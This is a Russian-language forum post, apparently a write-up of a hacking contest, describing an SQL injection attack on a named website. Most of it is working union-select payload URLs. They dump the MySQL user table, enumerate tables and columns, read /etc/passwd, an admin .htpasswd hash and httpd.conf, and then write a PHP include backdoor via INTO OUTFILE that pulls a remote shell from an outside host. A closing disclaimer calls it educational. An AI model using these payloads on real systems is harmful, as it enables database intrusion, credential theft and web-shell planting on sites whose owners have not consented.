Выкладываю по наставлению рыжего...потому как данная "статья" потерялась... Не плохой конкрус aka задание...понравилось... Ну начнем с того, что сперва находим ту самую "скуль", о котором говорилось в описании конкурса Код: http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,2,3,4,5,6/* Проверяем по-умолчанию таблицы: mysql.user и mysql.password и каково было моё удивление, когда обнаружилось, что у меня хватает прав на чтение mysql.user Код: http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,user,3,4,5,6+from+mysql.user/* Пароль у root'а пустой...попытался удаленно подключиться к их БД, естественно не вышло Смотрим дальше.... Код: http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,database(),3,4,5,6+from+mysql.user/* http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,version(),3,4,5,6+from+mysql.user/* Название базы - acanaru Версия: 5.0.33, что очень и очень меня порадовало... Спросите почему?...а всё просто... В mysql >=5 версии есть специальная таблица INFORMATION_SCHEMA, благодаря который можно узнать названия всех существующих таблиц и колонок в БД... Так чего же мы ждем...начинаем узнавать... Сперва таблицы: Код: http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,TABLE_NAME,3,4,5,6+from+INFORMATION_SCHEMA.TABLES+LIMIT+1,1-- http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,TABLE_NAME,3,4,5,6+from+INFORMATION_SCHEMA.TABLES+LIMIT+2,1-- И так далее... Видим, что в БД след. таблицы: Из всех таблиц заинтересовал только user... Узнаем колонки в ней... Код: http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,COLUMN_NAME,3,4,5,6+from+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME='user'+LIMIT+1,1-- http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,COLUMN_NAME,3,4,5,6+from+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME='user'+LIMIT+2,1-- Получаем: User, Password, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv....... Но вывести информацию из этой таблицы почему-то не вышло...посему я бросил затею с БД, и взялся за другую "разработку"... Админку долго искать не пришлось - _http://www.acana.ru/admin/ Вернемся к скули... Проверим привилегии типа FILE... Код: http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,LOAD_FILE('/etc/passwd'),3,4,5,6/* Все просто отлично! ) Чтобы залить шелл, имея привилегии типа FILE (что встречается очень и очень редко), нужно узнать полный путь к сайту... В надежде найти ошибку на сайте, которая смогла бы вывести тот самый путь, я начал везде и всюду тыкать спец. символы в различные параметры скриптов... Но к сожалению ничего не вышло... Ах да...забыл...перед этим получил хеш в DES админа: Код: http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,LOAD_FILE('/home/www/htdocs/admin/.htpasswd'),3,4,5,6/* Так и не сбрутился... Мне нужно было узнать полный путь к сайту...==> нужно было бы найти httpd.conf в котором хранится нужная мне информация... Долго искать, опять-таки, не пришлось, потому как находится он в "стандартном" месте: Код: http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,LOAD_FILE('/usr/local/apache/conf/httpd.conf'),3,4,5,6/* Узнаем мыло админа, логи доступа и нужный нам полный путь: Меня он немного смутил, посему так долго заливал шелл... А дальше всё просто... Код: http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,'<?%20include($_GET["inc"]);%20?>',3,4,5,6+INTO+OUTFILE+'/usr/local/apache/htdocs/999.php'/* Затем инклудим _http://acana.ru/999.php?inc=http://123.ru/shell.txt Дальше заливаем полноценный шелл непосредственно на сам сервер, если в этом есть необходимость... Вроде всё понятно и доступно рассказал... Всех благ... P.s. Информация выложена для учебных целей, а не для использовании ее на практики...